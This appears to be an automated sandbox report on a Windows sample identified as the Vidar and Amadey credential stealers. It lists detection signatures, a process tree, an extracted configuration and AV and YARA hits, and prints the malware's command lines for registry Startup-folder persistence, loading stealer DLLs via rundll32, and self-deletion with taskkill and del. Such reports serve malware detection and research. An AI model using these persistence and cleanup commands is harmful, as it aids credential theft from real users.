Loading ...

Play interactive tourEdit tour

Analysis Report wKYTg7Gp6P.exe

Overview

General Information

Sample Name:wKYTg7Gp6P.exe
Analysis ID:399582
MD5:c4c7d74ca7c0fc1511a82b040a274549
SHA1:b0b1f42d887a07d4bfae6b1e63900bad822b0908
SHA256:84343112791c187d10af9cea8fac68cf4fc03d72352f1fe2def0bf72f9a9afc7
Tags:ArkeiStealerexe
Infos:

Most interesting Screenshot:

Detection

Amadey Vidar
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected Amadey bot
Yara detected Amadeys stealer DLL
Yara detected Vidar stealer
Contains functionality to inject code into remote processes
Creates an undocumented autostart registry key
Creates files in alternative data streams (ADS)
Found many strings related to Crypto-Wallets (likely being stolen)
Machine Learning detection for dropped file
Machine Learning detection for sample
Posts data to a JPG file (protocol mismatch)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file access)
Antivirus or Machine Learning detection for unpacked file
Contains capabilities to detect virtual machines
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to launch a program with higher privileges
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
Is looking for software installed on the system
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
PE file contains strange resources
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Uses taskkill to terminate processes
Uses the keyboard layout for branch decision (may execute only for specific keyboard layouts)
Yara detected Credential Stealer

Classification

Startup

  • System is w10x64
  • wKYTg7Gp6P.exe (PID: 6924 cmdline: 'C:\Users\user\Desktop\wKYTg7Gp6P.exe' MD5: C4C7D74CA7C0FC1511A82B040A274549)
    • M7WCJ84VE5TXJ0R4.exe (PID: 6780 cmdline: 'C:\ProgramData\M7WCJ84VE5TXJ0R4.exe' MD5: 31AB82365078548DCEA62DA7C2380B2E)
      • blfte.exe (PID: 5756 cmdline: 'C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe' MD5: 31AB82365078548DCEA62DA7C2380B2E)
        • cmd.exe (PID: 6796 cmdline: 'C:\Windows\System32\cmd.exe' /C REG ADD 'HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders' /f /v Startup /t REG_SZ /d C:\Users\user\AppData\Local\Temp\e90e419c61\ MD5: F3BDBE3BB6F734E357235F4D5898582D)
          • conhost.exe (PID: 6820 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • reg.exe (PID: 6828 cmdline: REG ADD 'HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders' /f /v Startup /t REG_SZ /d C:\Users\user\AppData\Local\Temp\e90e419c61\ MD5: CEE2A7E57DF2A159A065A34913A055C2)
        • rundll32.exe (PID: 6248 cmdline: 'C:\Windows\System32\rundll32.exe' C:\ProgramData\1a9f26b569d5df\cred.dll, Main MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
        • rundll32.exe (PID: 1380 cmdline: 'C:\Windows\System32\rundll32.exe' C:\ProgramData\1a9f26b569d5df\scr.dll, Main MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • cmd.exe (PID: 5732 cmdline: 'C:\Windows\System32\cmd.exe' /c taskkill /im wKYTg7Gp6P.exe /f & timeout /t 6 & del /f /q 'C:\Users\user\Desktop\wKYTg7Gp6P.exe' & del C:\ProgramData\*.dll & exit MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 3028 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • taskkill.exe (PID: 6068 cmdline: taskkill /im wKYTg7Gp6P.exe /f MD5: 15E2E0ACD891510C6268CB8899F2A1A1)
      • timeout.exe (PID: 5724 cmdline: timeout /t 6 MD5: 121A4EDAE60A7AF6F5DFA82F7BB95659)
  • cleanup

Malware Configuration

Threatname: Vidar

{"Config: ": ["00000000 -> Version: 38.6", "Date: Wed Apr 28 22:58:45 2021", "MachineID: d06ed635-68f6-4e9a-955c-4899f5f57b9a", "GUID: {e6e9dfa8-98f2-11e9-90ce-806e6f6e6963}", "HWID: d06ed635-68f6-4e9a-955c-90ce-806e6f6e6963", "Path: C:\\Users\\user\\Desktop\\wKYTg7Gp6P.exe", "Work Dir: C:\\ProgramData\\CU50S1CYVL0A4WGXHOO1KFZGQ", "Windows: Windows 10 Pro [x64]", "Computer Name: 019635", "User Name: user", "Display Resolution: 1280x1024", "Display Language: en-US", "Keyboard Languages: English (United States)", "Local Time: 28/4/2021 22:58:45", "TimeZone: UTC1", "[Hardware]", "Processor: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz", "CPU Count: 4", "RAM: 8191 MB", "VideoCard: Microsoft Basic Display Adapter", "[Processes]", "---------- System [4]", "------------------------------  Registry [88]", "-  smss.exe [300]", "-  csrss.exe [400]", "-  wininit.exe [476]", "-  csrss.exe [488]", "-  services.exe [568]", "-  winlogon.exe [576]", "-  lsass.exe [592]", "-  fontdrvhost.exe [692]", "-  svchost.exe [712]", "-  fontdrvhost.exe [724]", "-  svchost.exe [800]", "-  svchost.exe [848]", "-  svchost.exe [888]", "-  dwm.exe [988]", "-  svchost.exe [340]", "-  svchost.exe [420]", "-  svchost.exe [396]", "-  svchost.exe [968]", "-  svchost.exe [1040]", "-  svchost.exe [1104]", "-  svchost.exe [1180]", "-  svchost.exe [1272]", "-  svchost.exe [1328]", "-  svchost.exe [1336]", "-  svchost.exe [1348]", "-  Memory Compression [1408]", "-  svchost.exe [1432]", "-  svchost.exe [1464]", "-  svchost.exe [1480]", "-  svchost.exe [1524]", "-  svchost.exe [1560]", "-  svchost.exe [1632]", "-  svchost.exe [1652]", "-  svchost.exe [1672]", "-  svchost.exe [1720]", "-  svchost.exe [1728]", "-  svchost.exe [1816]", "-  svchost.exe [1824]", "-  spoolsv.exe [1888]", "-  svchost.exe [1944]", "-  svchost.exe [2036]", "-  svchost.exe [1252]", "-  svchost.exe [1308]", "-  svchost.exe [2080]", "-  svchost.exe [2116]", "-  svchost.exe [2124]", "-  svchost.exe [2132]", "-  svchost.exe [2144]", "-  svchost.exe [2164]", "-  svchost.exe [2172]", "-  svchost.exe [2180]", "-  svchost.exe [2308]", "-  svchost.exe [2372]", "-  svchost.exe [2420]", "-  svchost.exe [2428]", "-  sihost.exe [3052]", "-  svchost.exe [2304]", "-  svchost.exe [2500]", "-  taskhostw.exe [3112]", "-  svchost.exe [3204]", "---------- ctfmon.exe [3284]", "-  explorer.exe [3424]", "-  smartscreen.exe [3516]", "-  svchost.exe [3676]", "-  dllhost.exe [3832]", "-  ShellExperienceHost.exe [4028]", "-  SearchUI.exe [3188]", "-  RuntimeBroker.exe [3656]", "-  RuntimeBroker.exe [4268]", "-  RuntimeBroker.exe [4772]", "-  WmiPrvSE.exe [5060]", "-  svchost.exe [4472]", "-  SgrmBroker.exe [4644]", "-  svchost.exe [4668]", "-  svchost.exe [3500]", "-  svchost.exe [4960]", "-  dllhost.exe [3564]", "-  ApplicationFrameHost.exe [4580]", "-  svchost.exe [160]", "-  audiodg.exe [2232]", "-  svchost.exe [2468]", "-  svchost.exe [4888]", "-  WMIADAP.exe [1620]", "-  WmiPrvSE.exe [500]", "-  WmiPrvSE.exe [2588]", "-  msiexec.exe [4184]", "-  svchost.exe [1504]", "-  svchost.exe [2856]", "-  svchost.exe [3408]", "-  DjaXdkqbRCmcGPJSmSfCjjO.exe [5176]", "-  DjaXdkqbRCmcGPJSmSfCjjO.exe [5204]", "-  DjaXdkqbRCmcGPJSmSfCjjO.exe [5216]", "-  DjaXdkqbRCmcGPJSmSfCjjO.exe [5232]", "-  DjaXdkqbRCmcGPJSmSfCjjO.exe [5240]", "-  DjaXdkqbRCmcGPJSmSfCjjO.exe [5252]", "-  DjaXdkqbRCmcGPJSmSfCjjO.exe [5260]", "-  DjaXdkqbRCmcGPJSmSfCjjO.exe [5268]", "-  DjaXdkqbRCmcGPJSmSfCjjO.exe [5276]", "-  DjaXdkqbRCmcGPJSmSfCjjO.exe [5288]", "-  DjaXdkqbRCmcGPJSmSfCjjO.exe [5296]", "-  DjaXdkqbRCmcGPJSmSfCjjO.exe [5304]", "-  DjaXdkqbRCmcGPJSmSfCjjO.exe [5316]", "-  DjaXdkqbRCmcGPJSmSfCjjO.exe [5324]", "-  DjaXdkqbRCmcGPJSmSfCjjO.exe [5332]", "-  DjaXdkqbRCmcGPJSmSfCjjO.exe [5344]", "-  DjaXdkqbRCmcGPJSmSfCjjO.exe [5352]", "-  DjaXdkqbRCmcGPJSmSfCjjO.exe [5360]", "-  DjaXdkqbRCmcGPJSmSfCjjO.exe [5376]", "-  DjaXdkqbRCmcGPJSmSfCjjO.exe [5384]", "-  DjaXdkqbRCmcGPJSmSfCjjO.exe [5392]", "-  svchost.exe [5664]", "-  wermgr.exe [5692]", "-  conhost.exe [5940]", "-  MusNotifyIcon.exe [6060]", "-  svchost.exe [6088]", "-  svchost.exe [2480]", "-  RuntimeBroker.exe [1848]", "-  UsoClient.exe [4500]", "-  UsoClient.exe [5908]", "-  svchost.exe [616]", "-  backgroundTaskHost.exe [1056]", "-  HxTsr.exe [2800]", "-  svchost.exe [4180]", "-  RuntimeBroker.exe [4284]", "-  RuntimeBroker.exe [6208]", "-  wKYTg7Gp6P.exe [6924]", "-  backgroundTaskHost.exe [7020]", "-  BackgroundTransferHost.exe [7084]", "[Software]", "Google Chrome [85.0.4183.121]", "Microsoft Office Professional Plus 2016 [16.0.4266.1001]", "Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 [12.0.30501.0]", "Microsoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 [12.0.21005]", "Microsoft Visual C++ 2010  x86 Redistributable - 10.0.30319 [10.0.30319]", "Microsoft Visual C++ 2019 X86 Minimum Runtime - 14.21.27702 [14.21.27702]", "Microsoft Visual C++ 2019 X86 Additional Runtime - 14.21.27702 [14.21.27702]", "Java 8 Update 211 [8.0.2110.12]", "Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 [11.0.61030.0]", "Microsoft Visual C++ 2015-2019 Redistributable (x86) - 14.21.27702 [14.21.27702.2]", "Java Auto Updater [2.8.211.12]", "Google Update Helper [1.3.35.451]", "Microsoft Office Professional Plus 2016 [16.0.4266.1001]", "Security Update for Microsoft Office 2016 (KB3114690) 32-Bit EditionUpdate for Microsoft Office 2016 (KB2920712) 32-Bit EditionUpdate for Microsoft Office 2016 (KB3141456) 32-Bit EditionUpdate for Microsoft Office 2016 (KB3115081) 32-Bit EditionUpdate for Microsoft Office 2016 (KB2920717) 32-Bit EditionUpdate for Microsoft Office 2016 (KB3114852) 32-Bit EditionUpdate for Microsoft Office 2016 (KB2920720) 32-Bit EditionUpdate for Microsoft Office 2016 (KB4022161) 32-Bit EditionSecurity Update for Microsoft Office 2016 (KB3128012) 32-Bit EditionSecurity Update for Microsoft Word 2016 (KB4484300) 32-Bit EditionSecurity Update for Microsoft PowerPoint 2016 (KB4484246) 32-Bit EditionUpdate for Microsoft Office 2016 (KB3118263) 32-Bit EditionSecurity Update for Microsoft Office 2016 (KB4022176) 32-Bit EditionUpdate for Microsoft Office 2016 (KB3114528) 32-Bit EditionSecurity Update for Microsoft Visio 2016 (KB4484244) 32-Bit EditionSecurity Update for Microsoft Office 2016 (KB4484287) 32-Bit EditionUpdate for Microsoft Office 2016 (KB3118262) 32-Bit EditionUpdate for Skype for Business 2016 (KB4484286) 32-Bit EditionSecurity Update for Microsoft Office 2016 (KB4484214) 32-Bit EditionSecurity Update for Microsoft Office 2016 (KB4011574) 32-Bit EditionUpdate for Microsoft Office 2016 (KB3213650) 32-Bit EditionUpdate for Microsoft Office 2016 (KB4462119) 32-Bit EditionUpdate for Microsoft Office 2016 (KB4032236) 32-Bit EditionSecurity Update for Microsoft Office 2016 (KB3085538) 32-Bit EditionUpdate for Microsoft Office 2016 (KB4484138) 32-Bit EditionDefinition Update for Microsoft Office 2016 (KB3115407) 32-Bit EditionUpdate for Microsoft Office 2016 (KB2920678) 32-Bit EditionUpdate for Microsoft Office 2016 (KB4475580) 32-Bit EditionUpdate for Microsoft Office 2016 (KB4484248) 32-Bit EditionSecurity Update for Microsoft Excel 2016 (KB4484273) 32-Bit EditionSecurity Update for Microsoft Publisher 2016 (KB4011097) 32-Bit EditionUpdate for Microsoft Office 2016 (KB4464586) 32-Bit EditionUpdate for Microsoft Office 2016 (KB4464538) 32-Bit EditionUpdate for Microsoft Office 2016 (KB4461435) 32-Bit EditionSecurity Update for Microsoft Outlook 2016 (KB4484274) 32-Bit EditionSecurity Update for Microsoft Project 2016 (KB4484269) 32-Bit EditionUpdate for Microsoft Office 2016 (KB3191929) 32-Bit EditionUpdate for Microsoft Office 2016 (KB4011259) 32-Bit EditionUpdate for Microsoft Office 2016 (KB4464535) 32-Bit EditionSecurity Update for Microsoft Office 2016 (KB2920727) 32-Bit EditionUpdate for Microsoft Office 2016 (KB3114903) 32-Bit EditionUpdate for Microsoft Office 2016 (KB2920724) 32-Bit EditionUpdate for Microsoft Office 2016 (KB4484101) 32-Bit EditionUpdate for Microsoft Office 2016 (KB3118264) 32-Bit EditionUpdate for Microsoft Office 2016 (KB4011629) 32-Bit EditionSecurity Update for Microsoft Access 2016 (KB4484167) 32-Bit EditionUpdate for Microsoft OneDrive for Business (KB4022219) 32-Bit EditionUpdate for Microsoft Office 2016 (KB4032254) 32-Bit EditionUpdate for Microsoft Office 2016 (KB4011225) 32-Bit EditionUpdate for Microsoft Office 2016 (KB4484106) 32-Bit EditionUpdate for Microsoft Office 2016 (KB4022193) 32-Bit EditionUpdate for Microsoft Office 2016 (KB4011634) 32-Bit EditionSecurity Update for Microsoft Office 2016 (KB4484258) 32-Bit EditionUpdate for Microsoft Office 2016 (KB3178666) 32-Bit EditionUpdate for Microsoft Office 2016 (KB4011669) 32-Bit EditionUpdate for Microsoft Office 2016 (KB4475588) 32-Bit EditionUpdate for Microsoft OneNote 2016 (KB4475586) 32-Bit EditionSecurity Update for Microsoft Office 2016 (KB3213551) 32-Bit EditionUpdate for Microsoft Office 2016 (KB4484145) 32-Bit EditionUpdate for Microsoft Office 2016 (KB3115276) 32-Bit EditionMicrosoft Access MUI (English) 2016 [16.0.4266.1001]", "Microsoft Excel MUI (English) 2016 [16.0.4266.1001]", "Security Update for Microsoft Excel 2016 (KB4484273) 32-Bit EditionUpdate for Microsoft Office 2016 (KB4011629) 32-Bit EditionMicrosoft PowerPoint MUI (English) 2016 [16.0.4266.1001]", "Security Update for Microsoft PowerPoint 2016 (KB4484246) 32-Bit EditionSecurity Update for Microsoft Excel 2016 (KB4484273) 32-Bit EditionMicrosoft Publisher MUI (English) 2016 [16.0.4266.1001]", "Security Update for Microsoft Publisher 2016 (KB4011097) 32-Bit EditionMicrosoft Outlook MUI (English) 2016 [16.0.4266.1001]", "Security Update for Microsoft Word 2016 (KB4484300) 32-Bit EditionSecurity Update for Microsoft Outlook 2016 (KB4484274) 32-Bit EditionMicrosoft Word MUI (English) 2016 [16.0.4266.1001]", "Security Update for Microsoft Word 2016 (KB4484300) 32-Bit EditionSecurity Update for Microsoft Excel 2016 (KB4484273) 32-Bit EditionMicrosoft Office Proofing Tools 2016 - English [16.0.4266.1001]", "Update for Microsoft Office 2016 (KB4464538) 32-Bit EditionOutils de v", "00002601 -> rification linguistique 2016 de Microsoft Office", "00002632 -> - Fran", "00002639 -> ais [16.0.4266.1001]", "Update for Microsoft Office 2016 (KB4464538) 32-Bit EditionHerramientas de correcci", "000026a3 -> n de Microsoft Office 2016: espa", "000026c4 -> ol [16.0.4266.1001]", "Update for Microsoft Office 2016 (KB4464538) 32-Bit EditionUpdate for Microsoft Office 2016 (KB3114528) 32-Bit EditionUpdate for Skype for Business 2016 (KB4484286) 32-Bit EditionUpdate for Microsoft Office 2016 (KB3213650) 32-Bit EditionUpdate for Microsoft Office 2016 (KB4462119) 32-Bit EditionSecurity Update for Microsoft Office 2016 (KB3085538) 32-Bit EditionSecurity Update for Microsoft Office 2016 (KB4022162) 32-Bit EditionUpdate for Microsoft Office 2016 (KB4484248) 32-Bit EditionUpdate for Microsoft Office 2016 (KB4464586) 32-Bit EditionSecurity Update for Microsoft Project 2016 (KB4484269) 32-Bit EditionUpdate for Microsoft OneDrive for Business (KB4022219) 32-Bit EditionUpdate for Microsoft Office 2016 (KB4484106) 32-Bit EditionUpdate for Microsoft Office 2016 (KB4011634) 32-Bit EditionUpdate for Microsoft Office 2016 (KB4475588) 32-Bit EditionUpdate for Microsoft OneNote 2016 (KB4475586) 32-Bit EditionUpdate for Microsoft OneDrive for Business (KB4022219) 32-Bit EditionMicrosoft Office Proofing (English) 2016 [16.0.4266.1001]", "Microsoft InfoPath MUI (English) 2016 [16.0.4266.1001]", "Microsoft Office Shared MUI (English) 2016 [16.0.4266.1001]", "Security Update for Microsoft Office 2016 (KB4022176) 32-Bit EditionSecurity Update for Microsoft Office 2016 (KB4484214) 32-Bit EditionSecurity Update for Microsoft Office 2016 (KB4011574) 32-Bit EditionUpdate for Microsoft Office 2016 (KB4475580) 32-Bit EditionUpdate for Microsoft Office 2016 (KB4484106) 32-Bit EditionSecurity Update for Microsoft Office 2016 (KB3213551) 32-Bit EditionMicrosoft DCF MUI (English) 2016 [16.0.4266.1001]", "Microsoft OneNote MUI (English) 2016 [16.0.4266.1001]", "Update for Microsoft OneNote 2016 (KB4475586) 32-Bit EditionMicrosoft Groove MUI (English) 2016 [16.0.4266.1001]", "Update for Microsoft OneDrive for Business (KB4022219) 32-Bit EditionMicrosoft Office OSM MUI (English) 2016 [16.0.4266.1001]", "Microsoft Office OSM UX MUI (English) 2016 [16.0.4266.1001]", "Microsoft Office Shared Setup Metadata MUI (English) 2016 [16.0.4266.1001]", "Microsoft Access Setup Metadata MUI (English) 2016 [16.0.4266.1001]", "Microsoft Skype for Business MUI (English) 2016 [16.0.4266.1001]", "Security Update for Microsoft Word 2016 (KB4484300) 32-Bit EditionUpdate for Skype for Business 2016 (KB4484286) 32-Bit EditionAdobe Refresh Manager [1.8.0]", "Adobe Acrobat Reader DC [19.012.20035]", "Microsoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030 [11.0.61030]", "Microsoft Visual C++ 2012 x86 Minimum Runtime - 11.0.61030 [11.0.61030]", "Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 [11.0.61030.0]", "Microsoft Visual C++ 2015-2019 Redistributable (x64) - 14.21.27702 [14.21.27702.2]", "Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 [12.0.30501.0]", "Microsoft Visual C++ 2013 x86 Additional Runtime - 12.0.21005 [12.0.21005]"]}

Yara Overview

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_AmadeyYara detected Amadey botJoe Security
    dump.pcapJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security

      Dropped Files

      SourceRuleDescriptionAuthorStrings
      C:\ProgramData\1a9f26b569d5df\cred.dllJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\cred[1].dllJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security

          Memory Dumps

          SourceRuleDescriptionAuthorStrings
          00000000.00000003.659819807.0000000002250000.00000004.00000001.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
            0000000A.00000002.923993621.00000000006DF000.00000004.00000001.sdmpJoeSecurity_AmadeyYara detected Amadey botJoe Security
              00000000.00000002.700376910.0000000002180000.00000040.00000001.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
                00000000.00000002.699959740.0000000000400000.00000040.00020000.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
                  Process Memory Space: wKYTg7Gp6P.exe PID: 6924JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                    Click to see the 2 entries

                    Unpacked PEs

                    SourceRuleDescriptionAuthorStrings
                    0.2.wKYTg7Gp6P.exe.400000.0.raw.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
                      0.3.wKYTg7Gp6P.exe.2250000.0.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
                        0.3.wKYTg7Gp6P.exe.2250000.0.raw.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
                          0.2.wKYTg7Gp6P.exe.400000.0.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
                            0.2.wKYTg7Gp6P.exe.2180e50.1.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
                              Click to see the 1 entries

                              Sigma Overview

                              No Sigma rule has matched

                              Signature Overview

                              Click to jump to signature section

                              Show All Signature Results

                              AV Detection:

                              barindex
                              Antivirus detection for dropped fileShow sources
                              Source: C:\ProgramData\1a9f26b569d5df\cred.dllAvira: detection malicious, Label: HEUR/AGEN.1137247
                              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\cred[1].dllAvira: detection malicious, Label: HEUR/AGEN.1137247
                              Source: C:\ProgramData\1a9f26b569d5df\scr.dllAvira: detection malicious, Label: HEUR/AGEN.1136939
                              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\scr[1].dllAvira: detection malicious, Label: HEUR/AGEN.1136939
                              Found malware configurationShow sources
                              Source: information.txt.0.dr.binstrMalware Configuration Extractor: Vidar {"Config: ": ["00000000 -> Version: 38.6", "Date: Wed Apr 28 22:58:45 2021", "MachineID: d06ed635-68f6-4e9a-955c-4899f5f57b9a", "GUID: {e6e9dfa8-98f2-11e9-90ce-806e6f6e6963}", "HWID: d06ed635-68f6-4e9a-955c-90ce-806e6f6e6963", "Path: C:\\Users\\user\\Desktop\\wKYTg7Gp6P.exe", "Work Dir: C:\\ProgramData\\CU50S1CYVL0A4WGXHOO1KFZGQ", "Windows: Windows 10 Pro [x64]", "Computer Name: 019635", "User Name: user", "Display Resolution: 1280x1024", "Display Language: en-US", "Keyboard Languages: English (United States)", "Local Time: 28/4/2021 22:58:45", "TimeZone: UTC1", "[Hardware]", "Processor: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz", "CPU Count: 4", "RAM: 8191 MB", "VideoCard: Microsoft Basic Display Adapter", "[Processes]", "---------- System [4]", "------------------------------ Registry [88]", "- smss.exe [300]", "- csrss.exe [400]", "- wininit.exe [476]", "- csrss.exe [488]", "- services.exe [568]", "- winlogon.exe [576]", "- lsass.exe [592]", "- fontdrvhost.exe [692]", "- svchost.exe [712]", "- fontdrvhost.exe [724]", "- svchost.exe [800]", "- svchost.exe [848]", "- svchost.exe [888]", "- dwm.exe [988]", "- svchost.exe [340]", "- svchost.exe [420]", "- svchost.exe [396]", "- svchost.exe [968]", "- svchost.exe [1040]", "- svchost.exe [1104]", "- svchost.exe [1180]", "- svchost.exe [1272]", "- svchost.exe [1328]", "- svchost.exe [1336]", "- svchost.exe [1348]", "- Memory Compression [1408]", "- svchost.exe [1432]", "- svchost.exe [1464]", "- svchost.exe [1480]", "- svchost.exe [1524]", "- svchost.exe [1560]", "- svchost.exe [1632]", "- svchost.exe [1652]", "- svchost.exe [1672]", "- svchost.exe [1720]", "- svchost.exe [1728]", "- svchost.exe [1816]", "- svchost.exe [1824]", "- spoolsv.exe [1888]", "- svchost.exe [1944]", "- svchost.exe [2036]", "- svchost.exe [1252]", "- svchost.exe [1308]", "- svchost.exe [2080]", "- svchost.exe [2116]", "- svchost.exe [2124]", "- svchost.exe [2132]", "- svchost.exe [2144]", "- svchost.exe [2164]", "- svchost.exe [2172]", "- svchost.exe [2180]", "- svchost.exe [2308]", "- svchost.exe [2372]", "- svchost.exe [2420]", "- svchost.exe [2428]", "- sihost.exe [3052]", "- svchost.exe [2304]", "- svchost.exe [2500]", "- taskhostw.exe [3112]", "- svchost.exe [3204]", "---------- ctfmon.exe [3284]", "- explorer.exe [3424]", "- smartscreen.exe [3516]", "- svchost.exe [3676]", "- dllhost.exe [3832]", "- ShellExperienceHost.exe [4028]", "- SearchUI.exe [3188]", "- RuntimeBroker.exe [3656]", "- RuntimeBroker.exe [4268]", "- RuntimeBroker.exe [4772]", "- WmiPrvSE.exe [5060]", "- svchost.exe [4472]", "- SgrmBroker.exe [4644]", "- svchost.exe [4668]", "- svchost.exe [3500]", "- svchost.exe [4960]", "- dllhost.exe [3564]", "- ApplicationFrameHost.exe [4580]", "- svchost.exe [160]", "- audiodg.exe [2232]", "- svchost.exe [2468]", "- svchost.exe [4888]", "- WMIADAP.exe [1620]", "- WmiPrvSE.exe [500]", "- WmiPrvSE.exe [2588]", "- msiexec.exe [
                              Multi AV Scanner detection for dropped fileShow sources
                              Source: C:\ProgramData\1a9f26b569d5df\cred.dllReversingLabs: Detection: 82%
                              Source: C:\ProgramData\1a9f26b569d5df\scr.dllReversingLabs: Detection: 82%
                              Multi AV Scanner detection for submitted fileShow sources
                              Source: wKYTg7Gp6P.exeVirustotal: Detection: 48%Perma Link
                              Source: wKYTg7Gp6P.exeReversingLabs: Detection: 58%
                              Machine Learning detection for dropped fileShow sources
                              Source: C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exeJoe Sandbox ML: detected
                              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\xsrv2[1].exeJoe Sandbox ML: detected
                              Source: C:\ProgramData\M7WCJ84VE5TXJ0R4.exeJoe Sandbox ML: detected
                              Machine Learning detection for sampleShow sources
                              Source: wKYTg7Gp6P.exeJoe Sandbox ML: detected
                              Source: 0.3.wKYTg7Gp6P.exe.2250000.0.unpackAvira: Label: TR/Patched.Ren.Gen
                              Source: 0.2.wKYTg7Gp6P.exe.2180e50.1.unpackAvira: Label: TR/Patched.Ren.Gen
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exeCode function: 0_2_0040B708 CryptUnprotectData,LocalAlloc,_memmove,LocalFree,0_2_0040B708

                              Compliance:

                              barindex
                              Detected unpacking (overwrites its own PE header)Show sources
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exeUnpacked PE file: 0.2.wKYTg7Gp6P.exe.400000.0.unpack
                              Source: C:\ProgramData\M7WCJ84VE5TXJ0R4.exeUnpacked PE file: 5.2.M7WCJ84VE5TXJ0R4.exe.400000.0.unpack
                              Source: C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exeUnpacked PE file: 10.2.blfte.exe.400000.0.unpack
                              Source: wKYTg7Gp6P.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                              Source: C:\Users\user\Desktop\wKYTg7Gp6P.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
                              Source: unknownHTTPS traffic detected: 104.17.63.50:443 -> 192.168.2.4:49733 version: TLS 1.2
                              Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb source: softokn3[1].dll.0.dr
                              Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss\lib\freebl\freebl_freebl3\freebl3.pdbZZ source: freebl3[1].dll.0.dr
                              Source: Binary string: vcruntime140.i386.pdb source: vcruntime140.dll.0.dr
                              Source: Binary string: vcruntime140.i386.pdbGCTL source: vcruntime140.dll.0.dr
                              Source: Binary string: D:\Mktmp\NL1\Release\NL1.pdb source: M7WCJ84VE5TXJ0R4.exe, blfte.exe
                              Source: Binary string: msvcp140.i386.pdbGCTL source: msvcp140.dll.0.dr
                              Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\mozglue\build\mozglue.pdb source: mozglue[1].dll.0.dr
                              Source: Binary string: UC:\kinukuconuwukuwok24_motowubidanagosumozi_dibiciyixaho-pow.pdbpdb source: wKYTg7Gp6P.exe, 00000000.00000003.684695927.0000000002CA4000.00000004.00000001.sdmp, M7WCJ84VE5TXJ0R4.exe, 00000005.00000000.695429336.0000000000415000.00000002.00020000.sdmp, blfte.exe, 0000000A.00000000.708934344.0000000000415000.00000002.00020000.sdmp, blfte.exe.5.dr
                              Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb)) source: softokn3[1].dll.0.dr
